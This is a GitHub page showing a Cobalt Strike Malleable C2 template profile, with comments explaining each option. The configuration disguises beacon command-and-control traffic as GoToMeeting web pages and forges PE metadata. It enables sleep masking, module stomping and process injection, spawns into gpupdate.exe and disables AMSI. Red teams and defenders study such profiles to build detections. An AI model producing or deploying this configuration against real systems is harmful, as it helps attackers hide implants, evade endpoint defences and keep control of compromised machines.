forked from xx0hcd/Malleable-C2-Profiles
-
Notifications
You must be signed in to change notification settings - Fork 0
/
template.profile
365 lines (286 loc) · 10.8 KB
/
template.profile
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
#template profile - updated with 3.14 options
#options from https://www.cobaltstrike.com/help-malleable-c2 and https://www.cobaltstrike.com/help-malleable-postex
#attempt to get everything in one place with examples.
#xx0hcd
###global options###
#shows profile name in reports.
set sample_name "whatever.profile";
set sleeptime "37500";
set jitter "33";
set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36";
#set true to use staged payloads, false to disable staged payloads.
#set host_stage "false";
###DNS options###
set dns_idle "8.8.8.8";
set maxdns "245";
set dns_sleep "0";
set dns_stager_prepend "";
set dns_stager_subhost "";
set dns_max_txt "252";
set dns_ttl "1";
###SMB options###
#use different strings for pipename and pipename_stager.
set pipename "ntsvcs";
set pipename_stager "scerpc";
###TCP options###
set tcp_port "8000";
###SSL Options###
#custom cert
#https-certificate {
#set keystore "your_store_file.store";
#set password "your_store_pass";
#}
#self sign cert
https-certificate {
set C "US";
set CN "whatever.com";
set L "California";
set O "whatever LLC.";
set OU "local.org";
set ST "CA";
set validity "365";
}
#code sign cert.
#code-signer {
#set keystore "your_keystore.jks";
#set password "your_password";
#set alias "server";
#}
###HTTP-Config Block###
#Order of server response headers. Or you can just fill them in manually under the server blocks.
http-config {
set headers "Server, Content-Type, Cache-Control, Connection";
header "Content-Type" "text/html;charset=UTF-8";
header "Connection" "close";
header "Cache-Control" "max-age=2";
header "Server" "nginx";
#set "true" if teamserver is behind redirector
set trust_x_forwarded_for "false";
}
###HTTP-GET Block###
#the http-get block checks if there are tasks queued.
http-get {
#You can specifiy multiple URI's with space between them.
set uri "/login /config /admin";
#default method is GET.
set verb "GET";
#set verb "POST";
client {
#Set headers based on traffic capture/Burp/etc.
header "Host" "whatever.com";
header "Accept" "*/*";
header "Accept-Language" "en-US";
header "Connection" "close";
metadata {
#Encoding options = append "string", base64, base64url, mask, netbios, netbiosu, prepend "string".
#base64
base64url;
#mask;
#netbios;
#netbiosu;
#prepend "TEST123";
append ".php";
#Termination statements = header "header", parameter "key", print, uri-append.
parameter "file";
#header "Cookie";
#uri-append;
#Have to set verb to POST if you want to use print in the client GET block.
#print;
}
#You can also add parameter values just to help mimic your site traffic.
parameter "test1" "test2";
}
server {
#headers are defined in the http-config block above, or you can set them manually here.
#header "Server" "nginx";
#the output keyword allows you to prepend/append data, to add site traffic, etc.
output {
netbios;
#netbiosu;
#base64;
#base64url;
#mask;
#Use prepend and append to mix your data in with normal looking site traffic. Escape double quotes and you can also use '\n'. c2lint shows '\n' as a period, but you can run it through Burp or pcap a HTTP payload to make sure everything is lining up correctly. Prepend strings need to be entered in reverse order, so the first string here is '"<!DOCTYPE html>\n";'.
prepend "content=";
prepend "<meta name=\"google-site-verification\"\n";
prepend "<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n";
prepend "<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n";
prepend "<link rel=\"canonical\" href=\"https://www.gotomeeting.com/b\">\n";
prepend "<title>Online Meeting Software with HD Video Conferencing | GoToMeeting</title>\n";
prepend " <meta charset=\"UTF-8\">\n";
prepend " <head>\n";
prepend "<html lang=\"en\">\n";
prepend "<!DOCTYPE html>\n";
append "\n<meta name=\"msvalidate.01\" content=\"63E628E67E6AD849F4185FA9AA7ABACA\">\n";
append "<script type=\"text/javascript\">\n";
append " var _kiq = _kiq || [];\n";
append " (function(){\n";
append " setTimeout(function(){\n";
append " var d = document, f = d.getElementsByTagName('script')[0], s =\n";
append "d.createElement('script'); s.type = 'text/javascript';\n";
append " s.async = true; s.src = '//s3.amazonaws.com/ki.js/66992/fWl.js';\n";
append "f.parentNode.insertBefore(s, f);\n";
append " }, 1);\n";
append "})();\n";
append "</script>\n";
append "</body>\n";
append "</html>\n";
#All server blocks use 'print' to termintate.
print;
}
}
}
###HTTP-Post Block###
#The same transform and termination rules apply as the client GET section above.
#if tasks are queued then http-post block processes them.
http-post {
#URI's cannot be the same as the http-get block URI's, even changing one case is fine.
set uri "/Login /Config /Admin";
set verb "GET";
#set verb "POST";
client {
header "Host" "whatever.com";
header "Accept" "*/*";
header "Accept-Language" "en";
header "Connection" "close";
output {
base64url;
parameter "testParam";
}
#You can put the beacon id in - parameter "key", header "header",
#cannot add transform statements to beacon id.
id {
base64url;
parameter "id";
#header "ID-Header":
}
}
server {
#headers are defined in the http-config block above, or you can set them manually here.
#header "Server" "nginx";
output {
netbios;
prepend "content=";
prepend "<meta name=\"google-site-verification\"\n";
prepend "<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n";
prepend "<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n";
prepend "<link rel=\"canonical\" href=\"https://www.gotomeeting.com/b\">\n";
prepend "<title>Online Meeting Software with HD Video Conferencing | GoToMeeting</title>\n";
prepend " <meta charset=\"UTF-8\">\n";
prepend " <head>\n";
prepend "<html lang=\"en\">\n";
prepend "<!DOCTYPE html>\n";
append "\n<meta name=\"msvalidate.01\" content=\"63E628E67E6AD849F4185FA9AA7ABACA\">\n";
append "<script type=\"text/javascript\">\n";
append " var _kiq = _kiq || [];\n";
append " (function(){\n";
append " setTimeout(function(){\n";
append " var d = document, f = d.getElementsByTagName('script')[0], s =\n";
append "d.createElement('script'); s.type = 'text/javascript';\n";
append " s.async = true; s.src = '//s3.amazonaws.com/ki.js/66992/fWl.js';\n";
append "f.parentNode.insertBefore(s, f);\n";
append " }, 1);\n";
append "})();\n";
append "</script>\n";
append "</body>\n";
append "</html>\n";
print;
}
}
}
###HTTP-Stager Block###
#Options to set if you are using a staged payload.
http-stager {
#Same URI rules apply as above, can't have URI's that match in any other client block.
set uri_x86 "/Console";
set uri_x64 "/console";
client {
header "Host" "whatever.com";
header "Accept" "*/*";
header "Accept-Language" "en-US";
header "Connection" "close";
#can use a parameter as well
parameter "test1" "test2";
}
server {
#headers are defined in the http-config block above, or you can set them manually here.
#header "Server" "nginx";
output {
prepend "content=";
append "</script>\n";
print;
}
}
}
###Malleable PE/Stage Block###
#use peclone on the dll you want to use, this example uses wwanmm.dll. You can also set the values manually.
#don't use 'set image_size_xx' if using 'set module_xx'. During testing it seemed to double the size of my payload causing module stomp to fail, need to test it out more though.
stage {
set checksum "0";
set compile_time "25 Oct 2016 01:57:23";
set entry_point "170000";
#set image_size_x86 "6586368";
#set image_size_x64 "6586368";
#set name "WWanMM.dll";
set userwx "false";
set cleanup "true";
set sleep_mask "true";
set stomppe "true";
set obfuscate "true";
set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
#obfuscate beacon before sleep.
set sleep_mask "true";
#module stomp. Make sure the dll you use is bigger than your payload and test it with post exploit options to make sure everything is working.
set module_x86 "wwanmm.dll";
set module_x64 "wwanmm.dll";
#transform allows you to remove, replace, and add strings to beacon's reflective dll stage.
transform-x86 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "";
strrep "beacon.dll" "";
}
transform-x64 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "";
strrep "beacon.x64.dll" "";
}
#can set a string in the .rdata section of the beacon dll.
#adds a zero-terminated string
#string "something";
#adds a string 'as-is'
#data "something";
#adds a wide (UTF-16LE encoded) string
stringw "something";
}
###Process Inject Block###
#controls process injection behavior
process-inject {
#Can use NtMapViewOfSection or VirtualAllocEx
#NtMapViewOfSection only allows same arch to same arch process injection.
set allocator "NtMapViewOfSection";
set min_alloc "16700";
set userwx "false";
set startrwx "true";
#prepend has to be valid code for current arch
transform-x86 {
prepend "\x90\x90\x90";
}
transform-x64 {
prepend "\x90\x90\x90";
}
execute {
CreateThread "ntdll!RtlUserThreadStart";
CreateThread;
NtQueueApcThread;
CreateRemoteThread;
RtlCreateUserThread;
}
}
###Post-Ex Block###
post-ex {
set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
set obfuscate "true";
set smartinject "true";
set amsi_disable "true";
}